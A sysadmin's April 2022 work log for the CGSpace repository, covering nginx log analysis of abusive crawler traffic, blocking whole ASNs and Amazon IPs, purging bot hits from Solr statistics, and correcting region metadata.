</span></span><span style="display:flex;"><span> 3064 66.249.66.221
</span></span><span style="display:flex;"><span> 95743 185.192.69.15
</span></span></code></pre></div><ul>
<li>185.192.69.15 is in the UK</li>
<li>I added a block for that IP in nginx and the load went down&hellip;</li>
</ul>
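<p>The <code>awk '{print $1}' | sort | uniq -c | sort -h</code> pipeline used to find these top IPs maps directly onto a <code>Counter</code> in Python (the log lines below are fabricated samples in combined-log format):</p>

```python
from collections import Counter

# Hypothetical access.log lines; the first whitespace-delimited field
# is the client IP, exactly what awk '{print $1}' extracts
log_lines = [
    '185.192.69.15 - - [13/Apr/2022:09:00:01 +0200] "GET /discover HTTP/1.1" 200 1024',
    '185.192.69.15 - - [13/Apr/2022:09:00:02 +0200] "GET /discover HTTP/1.1" 200 1024',
    '66.249.66.221 - - [13/Apr/2022:09:00:03 +0200] "GET /sitemap HTTP/1.1" 200 512',
]

hits = Counter(line.split()[0] for line in log_lines)
for ip, count in hits.most_common():
    print(f'{count:>7} {ip}')
```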
<h2 id="2022-04-16">2022-04-16</h2>
<ul>
<li>Start harvest on AReS</li>
</ul>
<h2 id="2022-04-18">2022-04-18</h2>
<ul>
<li>I woke up to several notices from UptimeRobot that CGSpace had gone down and up in the night (of course I&rsquo;m on holiday out of the country for Easter)
<ul>
<li>I see there are many locks in use from the XMLUI:</li>
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | grep -o -E <span style="color:#e6db74">&#39;(dspaceWeb|dspaceApi)&#39;</span> | sort | uniq -c
</span></span><span style="display:flex;"><span> 8932 dspaceWeb
</span></span></code></pre></div><ul>
<li>Looking at the top IPs making requests it seems they are Yandex, bingbot, and Googlebot:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq -c | sort -h
</span></span><span style="display:flex;"><span> 752 69.162.124.231
</span></span><span style="display:flex;"><span> 759 66.249.64.213
</span></span><span style="display:flex;"><span> 864 66.249.66.222
</span></span><span style="display:flex;"><span> 905 2a01:4f8:221:f::2
</span></span><span style="display:flex;"><span> 1013 84.33.2.97
</span></span><span style="display:flex;"><span> 1201 157.55.39.159
</span></span><span style="display:flex;"><span> 1204 157.55.39.144
</span></span><span style="display:flex;"><span> 1209 157.55.39.102
</span></span><span style="display:flex;"><span> 1217 157.55.39.161
</span></span><span style="display:flex;"><span> 1252 207.46.13.177
</span></span><span style="display:flex;"><span> 1274 157.55.39.162
</span></span><span style="display:flex;"><span> 2553 66.249.66.221
</span></span><span style="display:flex;"><span> 2941 95.108.213.28
</span></span></code></pre></div><ul>
<li>One IP is using a strange user agent though:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>84.33.2.97 - - [18/Apr/2022:00:20:38 +0200] &#34;GET /bitstream/handle/10568/109581/Banana_Blomme%20_2020.pdf.jpg HTTP/1.1&#34; 404 10890 &#34;-&#34; &#34;SomeRandomText&#34;
</span></span></code></pre></div><ul>
<li>Overall, it seems we had 17,000 unique IPs connecting in the last nine hours (currently 9:14AM and log file rolled over at 00:00):</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># cat /var/log/nginx/access.log | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq | wc -l
</span></span><span style="display:flex;"><span>17314
</span></span></code></pre></div><ul>
<li>That&rsquo;s a lot of unique IPs, and I see some patterns of IPs in China making ten to twenty requests each
<ul>
<li>The ISPs I&rsquo;ve seen so far are ChinaNet and China Unicom</li>
</ul>
</li>
<li>I extracted all the IPs from today and resolved them:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># cat /var/log/nginx/access.log | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq &gt; /tmp/2022-04-18-ips.txt
</span></span><span style="display:flex;"><span>$ ./ilri/resolve-addresses-geoip2.py -i /tmp/2022-04-18-ips.txt -o /tmp/2022-04-18-ips.csv
</span></span></code></pre></div><ul>
<li>The top ASNs by IP are:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">2</span> /tmp/2022-04-18-ips.csv | sed 1d | sort | uniq -c | sort -n | tail -n <span style="color:#ae81ff">10</span>
</span></span><span style="display:flex;"><span> 102 GOOGLE
</span></span><span style="display:flex;"><span> 139 Maxihost LTDA
</span></span><span style="display:flex;"><span> 165 AMAZON-02
</span></span><span style="display:flex;"><span> 393 &#34;China Mobile Communications Group Co., Ltd.&#34;
</span></span><span style="display:flex;"><span> 473 AMAZON-AES
</span></span><span style="display:flex;"><span> 616 China Mobile communications corporation
</span></span><span style="display:flex;"><span> 642 M247 Ltd
</span></span><span style="display:flex;"><span> 2336 HostRoyale Technologies Pvt Ltd
</span></span><span style="display:flex;"><span> 4556 Chinanet
</span></span><span style="display:flex;"><span> 5527 CHINA UNICOM China169 Backbone
</span></span><span style="display:flex;"><span>$ csvcut -c <span style="color:#ae81ff">4</span> /tmp/2022-04-18-ips.csv | sed 1d | sort | uniq -c | sort -n | tail -n <span style="color:#ae81ff">10</span>
</span></span><span style="display:flex;"><span> 139 262287
</span></span><span style="display:flex;"><span> 165 16509
</span></span><span style="display:flex;"><span> 180 204287
</span></span><span style="display:flex;"><span> 393 9808
</span></span><span style="display:flex;"><span> 473 14618
</span></span><span style="display:flex;"><span> 615 56041
</span></span><span style="display:flex;"><span> 642 9009
</span></span><span style="display:flex;"><span> 2156 203020
</span></span><span style="display:flex;"><span> 4556 4134
</span></span><span style="display:flex;"><span> 5527 4837
</span></span></code></pre></div><ul>
<li>I spot checked a few IPs from each of these and they are definitely just making bullshit requests to Discovery and HTML sitemap etc</li>
<li>I will download the IP blocks for each ASN except Google and Amazon and ban them</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ wget https://asn.ipinfo.app/api/text/nginx/AS4837 https://asn.ipinfo.app/api/text/nginx/AS4134 https://asn.ipinfo.app/api/text/nginx/AS203020 https://asn.ipinfo.app/api/text/nginx/AS9009 https://asn.ipinfo.app/api/text/nginx/AS56041 https://asn.ipinfo.app/api/text/nginx/AS9808
</span></span><span style="display:flex;"><span>$ cat AS* | sed -e <span style="color:#e6db74">&#39;/^$/d&#39;</span> -e <span style="color:#e6db74">&#39;/^#/d&#39;</span> -e <span style="color:#e6db74">&#39;/^{/d&#39;</span> -e <span style="color:#e6db74">&#39;s/deny //&#39;</span> -e <span style="color:#e6db74">&#39;s/;//&#39;</span> | sort | uniq | wc -l
</span></span><span style="display:flex;"><span>20296
</span></span></code></pre></div><ul>
<li>I extracted the IPv4 and IPv6 networks:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat AS* | sed -e <span style="color:#e6db74">&#39;/^$/d&#39;</span> -e <span style="color:#e6db74">&#39;/^#/d&#39;</span> -e <span style="color:#e6db74">&#39;/^{/d&#39;</span> -e <span style="color:#e6db74">&#39;s/deny //&#39;</span> -e <span style="color:#e6db74">&#39;s/;//&#39;</span> | grep <span style="color:#e6db74">&#34;:&#34;</span> | sort &gt; /tmp/ipv6-networks.txt
</span></span><span style="display:flex;"><span>$ cat AS* | sed -e <span style="color:#e6db74">&#39;/^$/d&#39;</span> -e <span style="color:#e6db74">&#39;/^#/d&#39;</span> -e <span style="color:#e6db74">&#39;/^{/d&#39;</span> -e <span style="color:#e6db74">&#39;s/deny //&#39;</span> -e <span style="color:#e6db74">&#39;s/;//&#39;</span> | grep -v <span style="color:#e6db74">&#34;:&#34;</span> | sort &gt; /tmp/ipv4-networks.txt
</span></span></code></pre></div><ul>
<li>I suspect we need to aggregate these networks since they are so many and nftables doesn&rsquo;t like it when they overlap:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ wc -l /tmp/ipv4-networks.txt
</span></span><span style="display:flex;"><span>15464 /tmp/ipv4-networks.txt
</span></span><span style="display:flex;"><span>$ aggregate6 /tmp/ipv4-networks.txt | wc -l
</span></span><span style="display:flex;"><span>2781
</span></span><span style="display:flex;"><span>$ wc -l /tmp/ipv6-networks.txt
</span></span><span style="display:flex;"><span>4833 /tmp/ipv6-networks.txt
</span></span><span style="display:flex;"><span>$ aggregate6 /tmp/ipv6-networks.txt | wc -l
</span></span><span style="display:flex;"><span>338
</span></span></code></pre></div><ul>
<li>I deployed these lists on CGSpace, ran all updates, and rebooted the server
<ul>
<li>This list is SURELY too broad because we will block legitimate users in China&hellip; but right now how can I discern?</li>
<li>Also, I need to purge the hits from these 14,000 IPs in Solr when I get time</li>
</ul>
</li>
<li>Looking back at the Munin graphs a few hours later I see this was indeed some kind of spike that was out of the ordinary:</li>
</ul>
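<p>Python&rsquo;s standard <code>ipaddress</code> module can do both jobs shown above: <code>collapse_addresses</code> plays the role of <code>aggregate6</code> for overlapping networks, and containment tests play the role of <code>grepcidr</code> (the networks below are illustrative, not the real ASN lists):</p>

```python
import ipaddress

# Overlapping networks like the per-ASN lists; collapse them like aggregate6 does
networks = [
    ipaddress.ip_network('27.184.0.0/13'),
    ipaddress.ip_network('27.184.0.0/14'),  # contained in the /13
    ipaddress.ip_network('27.190.0.0/15'),  # also contained in the /13
]
aggregated = list(ipaddress.collapse_addresses(networks))
print(aggregated)  # [IPv4Network('27.184.0.0/13')]

# Matching a client IP against the aggregated list, like grepcidr
ip = ipaddress.ip_address('27.185.1.1')
print(any(ip in net for net in aggregated))  # True
```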
<p><img src="/cgspace-notes/2022/04/postgres_connections_ALL-day.png" alt="PostgreSQL connections day">
<img src="/cgspace-notes/2022/04/jmx_dspace_sessions-day.png" alt="DSpace sessions day"></p>
<ul>
<li>I used <code>grepcidr</code> with the aggregated network lists to extract IPs matching those networks from the nginx logs for the past day:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort -u &gt; /tmp/ips.log
</span></span><span style="display:flex;"><span># <span style="color:#66d9ef">while</span> read -r network; <span style="color:#66d9ef">do</span> grepcidr $network /tmp/ips.log &gt;&gt; /tmp/ipv4-ips.txt; <span style="color:#66d9ef">done</span> &lt; /tmp/ipv4-networks-aggregated.txt
</span></span><span style="display:flex;"><span># <span style="color:#66d9ef">while</span> read -r network; <span style="color:#66d9ef">do</span> grepcidr $network /tmp/ips.log &gt;&gt; /tmp/ipv6-ips.txt; <span style="color:#66d9ef">done</span> &lt; /tmp/ipv6-networks-aggregated.txt
</span></span><span style="display:flex;"><span># wc -l /tmp/ipv4-ips.txt
</span></span><span style="display:flex;"><span>15313 /tmp/ipv4-ips.txt
</span></span><span style="display:flex;"><span># wc -l /tmp/ipv6-ips.txt
</span></span><span style="display:flex;"><span>19 /tmp/ipv6-ips.txt
</span></span></code></pre></div><ul>
<li>Then I purged them from Solr using the <code>check-spider-ip-hits.sh</code>:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-ip-hits.sh -f /tmp/ipv4-ips.txt -p
</span></span></code></pre></div><h2 id="2022-04-23">2022-04-23</h2>
<ul>
<li>A handful of spider user agents that I identified were merged into COUNTER-Robots so I updated the ILRI override in our DSpace and regenerated the <code>example</code> file that contains most patterns
<ul>
<li>I updated CGSpace, then ran all system updates and rebooted the host</li>
<li>I also ran <code>dspace cleanup -v</code> to prune the database</li>
</ul>
</li>
</ul>
<h2 id="2022-04-24">2022-04-24</h2>
<ul>
<li>Start a harvest on AReS</li>
</ul>
<h2 id="2022-04-25">2022-04-25</h2>
<ul>
<li>Looking at the countries on AReS I decided to collect a list to remind Jacquie at WorldFish again about how many incorrect ones they have
<ul>
<li>There are about sixty incorrect ones, some of which I can correct via the value mappings on AReS, but most I can&rsquo;t</li>
<li>I set up value mappings for seventeen countries, then sent another sixty or so to Jacquie and Salem to hopefully delete</li>
</ul>
</li>
<li>I notice we have over 1,000 items with region <code>Africa South of Sahara</code>
<ul>
<li>I am surprised to see these because we did a mass migration to <code>Sub-Saharan Africa</code> in 2020-10 when we aligned to UN M.49</li>
<li>Oh! It seems I used a capital O in <code>Of</code>!</li>
<li>This is curious, I see we missed <code>East Asia</code> and <code>North America</code>, because those are still in our list, but UN M.49 uses <code>Eastern Asia</code> and <code>Northern America</code>&hellip; I will have to raise that with Peter and Abenet later</li>
<li>For now I will just re-run my fixes:</li>
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat /tmp/regions.csv
</span></span><span style="display:flex;"><span>cg.coverage.region,correct
</span></span><span style="display:flex;"><span>East Africa,Eastern Africa
</span></span><span style="display:flex;"><span>West Africa,Western Africa
</span></span><span style="display:flex;"><span>Southeast Asia,South-eastern Asia
</span></span><span style="display:flex;"><span>South Asia,Southern Asia
</span></span><span style="display:flex;"><span>Africa South of Sahara,Sub-Saharan Africa
</span></span><span style="display:flex;"><span>North Africa,Northern Africa
</span></span><span style="display:flex;"><span>West Asia,Western Asia
</span></span><span style="display:flex;"><span>$ ./ilri/fix-metadata-values.py -i /tmp/regions.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f cg.coverage.region -m <span style="color:#ae81ff">227</span> -t correct
</span></span></code></pre></div><ul>
<li>Then I started a new harvest on AReS</li>
</ul>
<h2 id="2022-04-27">2022-04-27</h2>
<ul>
<li>I woke up to many up/down notices for CGSpace from UptimeRobot
<ul>
<li>The server has load 111.0&hellip; sigh.</li>
</ul>
</li>
<li>According to Grafana it seems to have started at 4:00 AM</li>
</ul>
<p><img src="/cgspace-notes/2022/04/cgspace-load.png" alt="Grafana load"></p>
<ul>
<li>There are a metric fuck ton of database locks from the XMLUI:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ psql -c <span style="color:#e6db74">&#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39;</span> | grep -o -E <span style="color:#e6db74">&#39;(dspaceWeb|dspaceApi)&#39;</span> | sort | uniq -c
</span></span><span style="display:flex;"><span> 128 dspaceApi
</span></span><span style="display:flex;"><span> 16890 dspaceWeb
</span></span></code></pre></div><ul>
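<li>The tail of that pipeline is a generic count-per-distinct-value idiom (the same tally could also be done server-side by grouping on <code>psa.application_name</code>); a toy reproduction of the counting step on fake data:</li>
</ul>
<pre tabindex="0"><code>$ printf 'dspaceWeb\ndspaceApi\ndspaceWeb\ndspaceWeb\n' | sort | uniq -c
      1 dspaceApi
      3 dspaceWeb
</code></pre><ul>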
<li>As for the server logs, I don&rsquo;t see many IPs connecting today:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># cat /var/log/nginx/access.log | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq | wc -l
</span></span><span style="display:flex;"><span>2924
</span></span></code></pre></div><ul>
<li>But there appear to be some IPs making many requests:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># cat /var/log/nginx/access.log | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq -c | sort -h
</span></span><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span> 345 207.46.13.53
</span></span><span style="display:flex;"><span> 646 66.249.66.222
</span></span><span style="display:flex;"><span> 678 54.90.79.112
</span></span><span style="display:flex;"><span> 1529 136.243.148.249
</span></span><span style="display:flex;"><span> 1797 54.175.8.110
</span></span><span style="display:flex;"><span> 2304 174.129.118.171
</span></span><span style="display:flex;"><span> 2523 66.249.66.221
</span></span><span style="display:flex;"><span> 2632 52.73.204.196
</span></span><span style="display:flex;"><span> 2667 54.174.240.122
</span></span><span style="display:flex;"><span> 5206 35.172.193.232
</span></span><span style="display:flex;"><span> 5646 35.153.131.101
</span></span><span style="display:flex;"><span> 6373 3.85.92.145
</span></span><span style="display:flex;"><span> 7383 34.227.10.4
</span></span><span style="display:flex;"><span> 8330 100.24.63.172
</span></span><span style="display:flex;"><span> 8342 34.236.36.176
</span></span><span style="display:flex;"><span> 8369 44.200.190.111
</span></span><span style="display:flex;"><span> 8371 3.238.116.153
</span></span><span style="display:flex;"><span> 8391 18.232.101.158
</span></span><span style="display:flex;"><span> 8631 3.239.81.247
</span></span><span style="display:flex;"><span> 8634 54.82.125.225
</span></span></code></pre></div><ul>
<li>54.82.125.225, 3.239.81.247, 18.232.101.158, 3.238.116.153, 44.200.190.111, 34.236.36.176, 100.24.63.172, 3.85.92.145, 35.153.131.101, 35.172.193.232, 54.174.240.122, 52.73.204.196, 174.129.118.171, 54.175.8.110, and 54.90.79.112 are all on Amazon and using this normal-looking user agent:</li>
</ul>
<pre tabindex="0"><code>Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
</code></pre><ul>
<li>None of these hosts are re-using their DSpace session IDs, so they are definitely not the normal browsers they claim to be:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ grep 54.82.125.225 dspace.log.2022-04-27 | grep -oE <span style="color:#e6db74">&#39;session_id=[A-Z0-9]{32}:ip_addr=&#39;</span> | sort | uniq | wc -l
</span></span><span style="display:flex;"><span>5760
</span></span><span style="display:flex;"><span>$ grep 3.239.81.247 dspace.log.2022-04-27 | grep -oE <span style="color:#e6db74">&#39;session_id=[A-Z0-9]{32}:ip_addr=&#39;</span> | sort | uniq | wc -l
</span></span><span style="display:flex;"><span>6053
</span></span><span style="display:flex;"><span>$ grep 18.232.101.158 dspace.log.2022-04-27 | grep -oE <span style="color:#e6db74">&#39;session_id=[A-Z0-9]{32}:ip_addr=&#39;</span> | sort | uniq | wc -l
</span></span><span style="display:flex;"><span>5841
</span></span><span style="display:flex;"><span>$ grep 3.238.116.153 dspace.log.2022-04-27 | grep -oE <span style="color:#e6db74">&#39;session_id=[A-Z0-9]{32}:ip_addr=&#39;</span> | sort | uniq | wc -l
</span></span><span style="display:flex;"><span>5887
</span></span><span style="display:flex;"><span>$ grep 44.200.190.111 dspace.log.2022-04-27 | grep -oE <span style="color:#e6db74">&#39;session_id=[A-Z0-9]{32}:ip_addr=&#39;</span> | sort | uniq | wc -l
</span></span><span style="display:flex;"><span>5899
</span></span><span style="display:flex;"><span>...
</span></span></code></pre></div><ul>
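<li>The check works because a real browser receives one session cookie and re-uses it, so its distinct <code>session_id</code> count stays near 1, while these hosts open a new session on every request; a sketch on hypothetical log lines:</li>
</ul>
<pre tabindex="0"><code>$ cat /tmp/dspace-sample.log
session_id=0123456789ABCDEF0123456789ABCDEF:ip_addr=1.2.3.4
session_id=0123456789ABCDEF0123456789ABCDEF:ip_addr=1.2.3.4
session_id=FEDCBA9876543210FEDCBA9876543210:ip_addr=1.2.3.4
$ grep -oE 'session_id=[A-Z0-9]{32}' /tmp/dspace-sample.log | sort -u | wc -l
2
</code></pre><ul>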
<li>And we can see a massive spike in sessions in Munin:</li>
</ul>
<p><img src="/cgspace-notes/2022/04/jmx_dspace_sessions-day2.png" alt="DSpace sessions in Munin"></p>
<ul>
<li>I see the following IPs using that user agent today:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span># grep <span style="color:#e6db74">&#39;Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36&#39;</span> /var/log/nginx/access.log | awk <span style="color:#e6db74">&#39;{print $1}&#39;</span> | sort | uniq -c | sort -h
</span></span><span style="display:flex;"><span> 678 54.90.79.112
</span></span><span style="display:flex;"><span> 1797 54.175.8.110
</span></span><span style="display:flex;"><span> 2697 174.129.118.171
</span></span><span style="display:flex;"><span> 2765 52.73.204.196
</span></span><span style="display:flex;"><span> 3072 54.174.240.122
</span></span><span style="display:flex;"><span> 5206 35.172.193.232
</span></span><span style="display:flex;"><span> 5646 35.153.131.101
</span></span><span style="display:flex;"><span> 6783 3.85.92.145
</span></span><span style="display:flex;"><span> 7763 34.227.10.4
</span></span><span style="display:flex;"><span> 8738 100.24.63.172
</span></span><span style="display:flex;"><span> 8748 34.236.36.176
</span></span><span style="display:flex;"><span> 8787 3.238.116.153
</span></span><span style="display:flex;"><span> 8794 18.232.101.158
</span></span><span style="display:flex;"><span> 8806 44.200.190.111
</span></span><span style="display:flex;"><span> 9021 54.82.125.225
</span></span><span style="display:flex;"><span> 9027 3.239.81.247
</span></span></code></pre></div><ul>
<li>I added those IPs to the firewall and then purged their hits from Solr:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
</span></span><span style="display:flex;"><span>Purging 6024 hits from 100.24.63.172 in statistics
</span></span><span style="display:flex;"><span>Purging 1719 hits from 174.129.118.171 in statistics
</span></span><span style="display:flex;"><span>Purging 5972 hits from 18.232.101.158 in statistics
</span></span><span style="display:flex;"><span>Purging 6053 hits from 3.238.116.153 in statistics
</span></span><span style="display:flex;"><span>Purging 6228 hits from 3.239.81.247 in statistics
</span></span><span style="display:flex;"><span>Purging 5305 hits from 34.227.10.4 in statistics
</span></span><span style="display:flex;"><span>Purging 6002 hits from 34.236.36.176 in statistics
</span></span><span style="display:flex;"><span>Purging 3908 hits from 35.153.131.101 in statistics
</span></span><span style="display:flex;"><span>Purging 3692 hits from 35.172.193.232 in statistics
</span></span><span style="display:flex;"><span>Purging 4525 hits from 3.85.92.145 in statistics
</span></span><span style="display:flex;"><span>Purging 6048 hits from 44.200.190.111 in statistics
</span></span><span style="display:flex;"><span>Purging 1942 hits from 52.73.204.196 in statistics
</span></span><span style="display:flex;"><span>Purging 1944 hits from 54.174.240.122 in statistics
</span></span><span style="display:flex;"><span>Purging 1264 hits from 54.175.8.110 in statistics
</span></span><span style="display:flex;"><span>Purging 6117 hits from 54.82.125.225 in statistics
</span></span><span style="display:flex;"><span>Purging 486 hits from 54.90.79.112 in statistics
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>Total number of bot hits purged: 67229
</span></span></code></pre></div><ul>
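<li>The firewalling step can be scripted from the same IP list; a sketch that just generates the rules (assuming plain <code>iptables</code> &mdash; the actual firewall mechanism isn&rsquo;t shown here):</li>
</ul>
<pre tabindex="0"><code>$ cat /tmp/ips.txt
54.82.125.225
3.239.81.247
$ while read -r ip; do printf 'iptables -A INPUT -s %s -j DROP\n' "$ip"; done &lt; /tmp/ips.txt
iptables -A INPUT -s 54.82.125.225 -j DROP
iptables -A INPUT -s 3.239.81.247 -j DROP
</code></pre><ul>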
<li>Then I created a CSV with these IPs and reported them to AbuseIPDB.com:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat /tmp/ips.csv
</span></span><span style="display:flex;"><span>IP,Categories,ReportDate,Comment
</span></span><span style="display:flex;"><span>100.24.63.172,4,2022-04-27T04:00:37-10:00,&#34;Excessive automated HTTP requests&#34;
</span></span><span style="display:flex;"><span>174.129.118.171,4,2022-04-27T04:00:37-10:00,&#34;Excessive automated HTTP requests&#34;
</span></span><span style="display:flex;"><span>18.232.101.158,4,2022-04-27T04:00:37-10:00,&#34;Excessive automated HTTP requests&#34;
</span></span><span style="display:flex;"><span>3.238.116.153,4,2022-04-27T04:00:37-10:00,&#34;Excessive automated HTTP requests&#34;
</span></span><span style="display:flex;"><span>3.239.81.247,4,2022-04-27T04:00:37-10:00,&#34;Excessive automated HTTP requests&#34;
</span></span><span style="display:flex;"><span>34.227.10.4,4,2022-04-27T04:00:37-10:00,&#34;Excessive automated HTTP requests&#34;
</span></span><span style="display:flex;"><span>34.236.36.176,4,2022-04-27T04:00:37-10:00,&#34;Excessive automated HTTP requests&#34;
</span></span><span style="display:flex;"><span>35.153.131.101,4,2022-04-27T04:00:37-10:00,&#34;Excessive automated HTTP requests&#34;
</span></span><span style="display:flex;"><span>35.172.193.232,4,2022-04-27T04:00:37-10:00,&#34;Excessive automated HTTP requests&#34;
</span></span><span style="display:flex;"><span>3.85.92.145,4,2022-04-27T04:00:37-10:00,&#34;Excessive automated HTTP requests&#34;
</span></span><span style="display:flex;"><span>44.200.190.111,4,2022-04-27T04:00:37-10:00,&#34;Excessive automated HTTP requests&#34;
</span></span><span style="display:flex;"><span>52.73.204.196,4,2022-04-27T04:00:37-10:00,&#34;Excessive automated HTTP requests&#34;
</span></span><span style="display:flex;"><span>54.174.240.122,4,2022-04-27T04:00:37-10:00,&#34;Excessive automated HTTP requests&#34;
</span></span><span style="display:flex;"><span>54.175.8.110,4,2022-04-27T04:00:37-10:00,&#34;Excessive automated HTTP requests&#34;
</span></span><span style="display:flex;"><span>54.82.125.225,4,2022-04-27T04:00:37-10:00,&#34;Excessive automated HTTP requests&#34;
</span></span><span style="display:flex;"><span>54.90.79.112,4,2022-04-27T04:00:37-10:00,&#34;Excessive automated HTTP requests&#34;
</span></span></code></pre></div><!-- raw HTML omitted -->
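<ul>
<li>Rather than typing that CSV by hand it can be generated from the IP list; a sketch (re-using the category code and comment from the report above, with the current time as the report date):</li>
</ul>
<pre tabindex="0"><code>$ ts=$(date +%Y-%m-%dT%H:%M:%S%:z)
$ echo 'IP,Categories,ReportDate,Comment' &gt; /tmp/ips.csv
$ while read -r ip; do printf '%s,4,%s,"Excessive automated HTTP requests"\n' "$ip" "$ts" &gt;&gt; /tmp/ips.csv; done &lt; /tmp/ips.txt
</code></pre>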
</article>
</div> <!-- /.blog-main -->
<aside class="col-sm-3 ml-auto blog-sidebar">
<section class="sidebar-module">
<h4>Recent Posts</h4>
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2022-04/">April, 2022</a></li>
<li><a href="/cgspace-notes/2022-03/">March, 2022</a></li>
<li><a href="/cgspace-notes/2022-02/">February, 2022</a></li>
<li><a href="/cgspace-notes/2022-01/">January, 2022</a></li>
<li><a href="/cgspace-notes/2021-12/">December, 2021</a></li>
</ol>
</section>
<section class="sidebar-module">
<h4>Links</h4>
<ol class="list-unstyled">
<li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
<li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
<li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
</ol>
</section>
</aside>
</div> <!-- /.row -->
</div> <!-- /.container -->
<footer class="blog-footer">
<p dir="auto">
Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
</p>
<p>
<a href="#">Back to top</a>
</p>
</footer>
</body>
</html>

Binary file not shown.

After

Width:  |  Height:  |  Size: 80 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 7.9 KiB

View File

@ -17,7 +17,7 @@
<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="404 Page not found"/>
<meta name="twitter:description" content="Documenting day-to-day work on the [CGSpace](https://cgspace.cgiar.org) repository."/>
<meta name="generator" content="Hugo 0.96.0" />
<meta name="generator" content="Hugo 0.97.3" />
@ -95,9 +95,9 @@
<ol class="list-unstyled">
